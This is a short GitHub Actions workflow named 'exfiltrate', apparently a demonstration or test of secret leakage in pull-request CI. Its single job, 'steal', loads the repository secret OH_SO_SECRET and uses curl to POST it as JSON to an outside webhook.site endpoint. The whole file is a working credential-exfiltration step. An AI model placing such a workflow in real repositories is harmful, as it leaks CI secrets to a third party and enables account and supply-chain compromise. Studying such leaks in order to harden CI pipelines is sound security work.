name: exfiltrate

on:
  pull_request:

permissions: {}

jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4
    - name: post
      env:
        OH_SO_SECRET: ${{ secrets.OH_SO_SECRET }}
      run: |
        curl -X POST https://webhook.site/dff546d1-ec85-4508-966f-d92aa7ef7b47 \
          -H "Content-Type: application/json" \
          -d "$(jq -n --arg secret "${OH_SO_SECRET}" '{ secret: $secret }')"
